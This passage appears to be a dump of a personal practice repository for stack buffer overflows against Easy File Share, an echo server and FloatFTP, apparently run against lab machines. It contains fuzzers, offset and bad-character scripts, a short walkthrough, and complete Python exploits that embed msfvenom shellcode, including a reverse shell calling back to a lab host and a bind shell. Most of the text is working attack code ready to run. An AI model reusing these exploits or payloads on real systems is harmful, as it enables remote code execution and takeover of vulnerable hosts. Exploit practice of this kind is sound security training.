16 | s.send(("GET " + buff + " HTTP/1.0\r\n\r\n")) 17 | s.recv(1024) 18 | s.close() 19 | 20 | except: 21 | print("Unable to connect.......") 22 | sys.exit() -------------------------------------------------------------------------------- /BufferOverflow/Easy_FIle_Share/Shellcode.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | import os 4 | import sys, struct 5 | 6 | #msfvenom -p windows/shell_reverse_tcp LHOS=192.168.0.135 LPORT=1234 EXITFUNC=thread -f c -b "\x00\x20" 7 | 8 | Shellcode= ("\xbb\xa9\xf6\x1c\x9a\xdb\xd6\xd9\x74\x24\xf4\x5a\x33\xc9\xb1" 9 | "\x52\x83\xc2\x04\x31\x5a\x0e\x03\xf3\xf8\xfe\x6f\xff\xed\x7d" 10 | "\x8f\xff\xed\xe1\x19\x1a\xdc\x21\x7d\x6f\x4f\x92\xf5\x3d\x7c" 11 | "\x59\x5b\xd5\xf7\x2f\x74\xda\xb0\x9a\xa2\xd5\x41\xb6\x97\x74" 12 | "\xc2\xc5\xcb\x56\xfb\x05\x1e\x97\x3c\x7b\xd3\xc5\x95\xf7\x46" 13 | "\xf9\x92\x42\x5b\x72\xe8\x43\xdb\x67\xb9\x62\xca\x36\xb1\x3c" 14 | "\xcc\xb9\x16\x35\x45\xa1\x7b\x70\x1f\x5a\x4f\x0e\x9e\x8a\x81" 15 | "\xef\x0d\xf3\x2d\x02\x4f\x34\x89\xfd\x3a\x4c\xe9\x80\x3c\x8b" 16 | "\x93\x5e\xc8\x0f\x33\x14\x6a\xeb\xc5\xf9\xed\x78\xc9\xb6\x7a" 17 | "\x26\xce\x49\xae\x5d\xea\xc2\x51\xb1\x7a\x90\x75\x15\x26\x42" 18 | "\x17\x0c\x82\x25\x28\x4e\x6d\x99\x8c\x05\x80\xce\xbc\x44\xcd" 19 | "\x23\x8d\x76\x0d\x2c\x86\x05\x3f\xf3\x3c\x81\x73\x7c\x9b\x56" 20 | "\x73\x57\x5b\xc8\x8a\x58\x9c\xc1\x48\x0c\xcc\x79\x78\x2d\x87" 21 | "\x79\x85\xf8\x08\x29\x29\x53\xe9\x99\x89\x03\x81\xf3\x05\x7b" 22 | "\xb1\xfc\xcf\x14\x58\x07\x98\xda\x35\x07\xdf\xb3\x47\x07\xdb" 23 | "\x91\xc1\xe1\x89\x05\x84\xba\x25\xbf\x8d\x30\xd7\x40\x18\x3d" 24 | "\xd7\xcb\xaf\xc2\x96\x3b\xc5\xd0\x4f\xcc\x90\x8a\xc6\xd3\x0e" 25 | "\xa2\x85\x46\xd5\x32\xc3\x7a\x42\x65\x84\x4d\x9b\xe3\x38\xf7" 26 | "\x35\x11\xc1\x61\x7d\x91\x1e\x52\x80\x18\xd2\xee\xa6\x0a\x2a" 27 | "\xee\xe2\x7e\xe2\xb9\xbc\x28\x44\x10\x0f\x82\x1e\xcf\xd9\x42" 28 | "\xe6\x23\xda\x14\xe7\x69\xac\xf8\x56\xc4\xe9\x07\x56\x80\xfd" 29 
| "\x70\x8a\x30\x01\xab\x0e\x50\xe0\x79\x7b\xf9\xbd\xe8\xc6\x64" 30 | "\x3e\xc7\x05\x91\xbd\xed\xf5\x66\xdd\x84\xf0\x23\x59\x75\x89" 31 | "\x3c\x0c\x79\x3e\x3c\x05") 32 | 33 | jmp_esp= struct.pack(" 1036 } 17 | 2. bad char \x00 18 | 3. return address => "0028F700" 43434343 CCCC 19 | 20 | "\x00\xf7\x28\x00" 21 | 22 | 23 | 24 | -------------------------------------------------------------------------------- /BufferOverflow/Echo_server_V2/Eip_control.py: -------------------------------------------------------------------------------- 1 | #!/bin/python 2 | import sys, socket 3 | 4 | Shellcode="A" * 1036+ "B" * 4 5 | 6 | 7 | try: 8 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 9 | s.connect(('192.168.0.129',9000)) 10 | print("Sending pattern to Remote server" ) 11 | s.send(Shellcode) 12 | print s.recv(1024) 13 | print "\nDone!." 14 | s.close() 15 | 16 | except: 17 | print("Error in connecting") 18 | sys.exit() 19 | -------------------------------------------------------------------------------- /BufferOverflow/Echo_server_V2/bad_char.py: -------------------------------------------------------------------------------- 1 | #!/bin/python 2 | import sys, socket 3 | 4 | badchars = ( 5 | "\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10" 6 | "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20" 7 | "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30" 8 | "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 9 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50" 10 | "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60" 11 | "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70" 12 | "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80" 13 | "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90" 14 | "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0" 15 | "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0" 16 | 
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0" 17 | "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0" 18 | "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0" 19 | "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0" 20 | "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" 21 | ) 22 | 23 | 24 | Shellcode="A" * 1036+ "B" * 4 + badchars 25 | 26 | 27 | try: 28 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 29 | s.connect(('192.168.0.129',9000)) 30 | print("Sending pattern to Remote server" ) 31 | s.send(Shellcode) 32 | print s.recv(1024) 33 | print "\nDone!." 34 | s.close() 35 | 36 | except: 37 | print("Error in connecting") 38 | sys.exit() 39 | -------------------------------------------------------------------------------- /BufferOverflow/Echo_server_V2/extra_op.py: -------------------------------------------------------------------------------- 1 | #!/bin/python 2 | import sys, socket 3 | 4 | Shellcode="A" * 1036+ "B" * 4 + "C" * 1000 5 | 6 | try: 7 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 8 | s.connect(('192.168.0.129',9000)) 9 | print("Sending pattern to Remote server" ) 10 | s.send(Shellcode) 11 | print s.recv(1024) 12 | print "\nDone!." 13 | s.close() 14 | 15 | except: 16 | print("Error in connecting") 17 | sys.exit() 18 | -------------------------------------------------------------------------------- /BufferOverflow/Echo_server_V2/extra_op2.py: -------------------------------------------------------------------------------- 1 | #!/bin/python 2 | import sys, socket 3 | #0028F764 4 | 5 | Shellcode="A" * 1036+ "\x64\xf7\x28\x00"+ "C" * 1000 6 | 7 | try: 8 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 9 | s.connect(('192.168.0.129',9000)) 10 | print("Sending pattern to Remote server" ) 11 | s.send(Shellcode) 12 | print s.recv(1024) 13 | print "\nDone!." 
14 | s.close() 15 | 16 | except: 17 | print("Error in connecting") 18 | sys.exit() 19 | -------------------------------------------------------------------------------- /BufferOverflow/Echo_server_V2/fuzz.py: -------------------------------------------------------------------------------- 1 | import sys, socket 2 | from time import sleep 3 | 4 | buffer ="A" * 2000 5 | 6 | while True: 7 | try: 8 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 9 | s.connect(('192.168.0.129',9000)) 10 | print "Trying with buffer length %d" % len(buffer) 11 | s.send((buffer )) 12 | s.recv(1024) 13 | s.close() 14 | 15 | #buffer=buffer + "A"*100 16 | 17 | 18 | except: 19 | print("Fuzzing Crashed at %s by" % str(len(buffer))) 20 | sys.exit() -------------------------------------------------------------------------------- /BufferOverflow/Echo_server_V2/offset.py: -------------------------------------------------------------------------------- 1 | #!/bin/python 2 | import sys, socket 3 | 4 | offset="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4B
h5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co" 5 | 6 | 7 | try: 8 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 9 | s.connect(('192.168.0.129',9000)) 10 | print("Sending pattern to Remote server" ) 11 | s.send(offset) 12 | print s.recv(1024) 13 | print "\nDone!." 
14 | s.close() 15 | 16 | except: 17 | print("Error in connecting") 18 | sys.exit() 19 | -------------------------------------------------------------------------------- /BufferOverflow/Echo_server_V2/shellcode.py: -------------------------------------------------------------------------------- 1 | #!/bin/python 2 | 3 | #binf shell msfvenom -p windows/shell_bind_tcp -f c 4 | 5 | #"\x64\xf7\x28\x00" 6 | import sys, socket 7 | 8 | code = ( 9 | "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30" 10 | "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" 11 | "\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52" 12 | "\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1" 13 | "\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b" 14 | "\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03" 15 | "\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b" 16 | "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24" 17 | "\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb" 18 | "\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c" 19 | "\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68" 20 | "\x29\x80\x6b\x00\xff\xd5\x6a\x08\x59\x50\xe2\xfd\x40\x50\x40" 21 | "\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x68\x02\x00\x11\x5c\x89" 22 | "\xe6\x6a\x10\x56\x57\x68\xc2\xdb\x37\x67\xff\xd5\x57\x68\xb7" 23 | "\xe9\x38\xff\xff\xd5\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x97" 24 | "\x68\x75\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57" 25 | "\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c" 26 | "\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46" 27 | "\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0" 28 | "\x4e\x56\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5" 29 | "\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb" 30 | "\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5") 31 | 32 | 33 | 34 | 35 | 36 | Shellcode="A" * 1036+ "\x64\xf7\x28\x00" 
+ "\x90" * 10 + code 37 | 38 | 39 | Shellcode = "\x90" * 36 + code +"\x64\xf7\x28\x00" 40 | 41 | try: 42 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 43 | s.connect(('192.168.0.129',9000)) 44 | print("Sending pattern to Remote server" ) 45 | s.send(Shellcode) 46 | print s.recv(1024) 47 | print "\nDone!." 48 | s.close() 49 | 50 | except: 51 | print("Error in connecting") 52 | sys.exit() 53 | -------------------------------------------------------------------------------- /BufferOverflow/Echo_server_V2/walkthi: -------------------------------------------------------------------------------- 1 | ./// Echo server v2 2 | 3 | APp Echo Server 4 | IP :192.169.0.129 5 | 6 | Port 9000 7 | ___________________________________ 8 | 9 | 1. Buffer sent 2000 crashed 10 | 11 | 2. create pattern 2000 12 | 13 | 3. EIP vlaue => 69423569 14 | 15 | 4. offset vlaue=> 1036 16 | 17 | 5. Sending Extra character in buffer {A+B+C} 18 | 19 | 6. Observed that EIP ="B{42}" not point to next instruction for "C(43") 20 | 21 | 7. Point EIp to somwhere in Buffer where entry fo "A" is there{0028F764} and check TOS 22 | 23 | 8.send paylaod again look TOS 24 | 25 | 9. 
Send final shellcode 26 | 27 | -------------------------------------------------------------------------------- /BufferOverflow/FLoatFTP/@old/badc1.py: -------------------------------------------------------------------------------- 1 | import socket 2 | 3 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 4 | badchars = ( 5 | "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0d\x0e\x0f\x10" 6 | "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20" 7 | "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30" 8 | "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 9 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50" 10 | "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60" 11 | "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70" 12 | "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80" 13 | "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90" 14 | "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0" 15 | "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0" 16 | "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0" 17 | "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0" 18 | "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0" 19 | "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0" 20 | "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" 21 | ) 22 | buffer = "A" * 247+ "B" * 4 + badchars 23 | try: 24 | print "\nSending evil buffer..." 25 | s.connect(('192.168.1.190', 21)) 26 | s.send('GET ' + buffer + '\r\n\r\n') 27 | print s.recv(1024) 28 | s.close() 29 | print "\nDone!" 
30 | except: 31 | print "Could not connect" -------------------------------------------------------------------------------- /BufferOverflow/FLoatFTP/@old/badc2.py: -------------------------------------------------------------------------------- 1 | import socket 2 | 3 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 4 | badchars = ( 5 | "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0e\x0f\x10" 6 | "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20" 7 | "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30" 8 | "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 9 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50" 10 | "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60" 11 | "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70" 12 | "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80" 13 | "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90" 14 | "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0" 15 | "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0" 16 | "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0" 17 | "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0" 18 | "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0" 19 | "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0" 20 | "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" 21 | ) 22 | buffer = "A" * 247+ "B" * 4 + badchars 23 | try: 24 | print "\nSending evil buffer..." 25 | s.connect(('192.168.1.190', 21)) 26 | s.send('GET ' + buffer + '\r\n\r\n') 27 | print s.recv(1024) 28 | s.close() 29 | print "\nDone!" 
30 | except: 31 | print "Could not connect" -------------------------------------------------------------------------------- /BufferOverflow/FLoatFTP/@old/badchar.py: -------------------------------------------------------------------------------- 1 | import socket 2 | 3 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 4 | badchars = ( 5 | "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" 6 | "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 7 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" 8 | "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" 9 | "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" 10 | "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" 11 | "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" 12 | "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" 13 | ) 14 | buffer = "A" * 247+ "B" * 4 + badchars 15 | try: 16 | print "\nSending evil buffer..." 17 | s.connect(('192.168.1.116', 21)) 18 | s.send('GET ' + buffer + '\r\n\r\n') 19 | print s.recv(1024) 20 | s.close() 21 | print "\nDone!" 
22 | except: 23 | print "Could not connect" -------------------------------------------------------------------------------- /BufferOverflow/FLoatFTP/@old/exploit.py: -------------------------------------------------------------------------------- 1 | import socket 2 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 3 | sock.connect(('192.168.1.116',21)) 4 | pre_buff="GET " 5 | 6 | end_buff=" HTTP/1.1\r\n\r\n" 7 | #Return address 7xb32d69 is written like that because of little endian 8 | buf = "" 9 | buf += "\xda\xc1\xba\xf5\xf0\x2d\x2c\xd9\x74\x24\xf4\x5e\x29" 10 | buf += "\xc9\xb1\x52\x83\xee\xfc\x31\x56\x13\x03\xa3\xe3\xcf" 11 | buf += "\xd9\xb7\xec\x92\x22\x47\xed\xf2\xab\xa2\xdc\x32\xcf" 12 | buf += "\xa7\x4f\x83\x9b\xe5\x63\x68\xc9\x1d\xf7\x1c\xc6\x12" 13 | buf += "\xb0\xab\x30\x1d\x41\x87\x01\x3c\xc1\xda\x55\x9e\xf8" 14 | buf += "\x14\xa8\xdf\x3d\x48\x41\x8d\x96\x06\xf4\x21\x92\x53" 15 | buf += "\xc5\xca\xe8\x72\x4d\x2f\xb8\x75\x7c\xfe\xb2\x2f\x5e" 16 | buf += "\x01\x16\x44\xd7\x19\x7b\x61\xa1\x92\x4f\x1d\x30\x72" 17 | buf += "\x9e\xde\x9f\xbb\x2e\x2d\xe1\xfc\x89\xce\x94\xf4\xe9" 18 | buf += "\x73\xaf\xc3\x90\xaf\x3a\xd7\x33\x3b\x9c\x33\xc5\xe8" 19 | buf += "\x7b\xb0\xc9\x45\x0f\x9e\xcd\x58\xdc\x95\xea\xd1\xe3" 20 | buf += "\x79\x7b\xa1\xc7\x5d\x27\x71\x69\xc4\x8d\xd4\x96\x16" 21 | buf += "\x6e\x88\x32\x5d\x83\xdd\x4e\x3c\xcc\x12\x63\xbe\x0c" 22 | buf += "\x3d\xf4\xcd\x3e\xe2\xae\x59\x73\x6b\x69\x9e\x74\x46" 23 | buf += "\xcd\x30\x8b\x69\x2e\x19\x48\x3d\x7e\x31\x79\x3e\x15" 24 | buf += "\xc1\x86\xeb\xba\x91\x28\x44\x7b\x41\x89\x34\x13\x8b" 25 | buf += "\x06\x6a\x03\xb4\xcc\x03\xae\x4f\x87\xeb\x87\x4e\x24" 26 | buf += "\x84\xd5\x50\xdb\x08\x53\xb6\xb1\xa0\x35\x61\x2e\x58" 27 | buf += "\x1c\xf9\xcf\xa5\x8a\x84\xd0\x2e\x39\x79\x9e\xc6\x34" 28 | buf += "\x69\x77\x27\x03\xd3\xde\x38\xb9\x7b\xbc\xab\x26\x7b" 29 | buf += "\xcb\xd7\xf0\x2c\x9c\x26\x09\xb8\x30\x10\xa3\xde\xc8" 30 | buf += "\xc4\x8c\x5a\x17\x35\x12\x63\xda\x01\x30\x73\x22\x89" 31 | buf += 
"\x7c\x27\xfa\xdc\x2a\x91\xbc\xb6\x9c\x4b\x17\x64\x77" 32 | buf += "\x1b\xee\x46\x48\x5d\xef\x82\x3e\x81\x5e\x7b\x07\xbe" 33 | buf += "\x6f\xeb\x8f\xc7\x8d\x8b\x70\x12\x16\xbb\x3a\x3e\x3f" 34 | buf += "\x54\xe3\xab\x7d\x39\x14\x06\x41\x44\x97\xa2\x3a\xb3" 35 | buf += "\x87\xc7\x3f\xff\x0f\x34\x32\x90\xe5\x3a\xe1\x91\x2f" 36 | 37 | buff = "A"*247 + "\x03\xb5\xdd\x75"+"\x90"*20+buf 38 | final_buff = pre_buff+buff+end_buff 39 | sock.send(final_buff) 40 | sock.recv(1024) 41 | sock.close() 42 | 43 | 44 | 45 | -------------------------------------------------------------------------------- /BufferOverflow/FLoatFTP/@old/newoffset.py: -------------------------------------------------------------------------------- 1 | import socket 2 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 3 | sock.connect(('192.168.1.116',21)) 4 | pre_buff="GET " 5 | buff = "A"*247 +"B"*4 + "C"*749 6 | end_buff=" HTTP/1.1\r\n\r\n" 7 | final_buff = pre_buff+buff+end_buff 8 | sock.send(final_buff) 9 | sock.recv(1024) 10 | sock.close() -------------------------------------------------------------------------------- /BufferOverflow/FLoatFTP/@old/pattern.py: -------------------------------------------------------------------------------- 1 | import socket 2 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 3 | sock.connect(('192.168.1.116',21)) 4 | pre_buff = "GET " 5 | buff = 